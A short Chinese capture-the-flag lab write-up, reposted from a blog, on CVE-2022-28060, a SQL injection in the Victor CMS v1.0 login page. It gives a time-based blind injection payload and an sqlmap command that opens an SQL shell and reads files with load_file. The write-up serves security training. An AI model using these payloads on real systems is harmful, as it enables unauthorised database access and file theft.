春秋云境:CVE-2022-28060
文章合集:春秋云境系列靶场记录(合集)
Victor CMS v1.0 sql注入:CVE-2022-28060
漏洞介绍
Victor CMS v1.0 /includes/login.php 存在sql注入
解题步骤
- 访问URL,在登录过程中抓包:
- 探测存在SQL注入:
1'+AND+(SELECT*FROM+(SELECT+SLEEP(5))a)+AND+'1'='
- 使用Sqlmap获取flag,通过–sql-shell再传入load_file进行文件读取:
python sqlmap.py -r 1.txt --sql-shell -v
select load_file('/flag')
文章合集:春秋云境系列靶场记录(合集)
本文转载自: https://blog.csdn.net/laobanjiull/article/details/128106023
版权归原作者 Acczdy 所有, 如有侵权,请联系我们删除。
版权归原作者 Acczdy 所有, 如有侵权,请联系我们删除。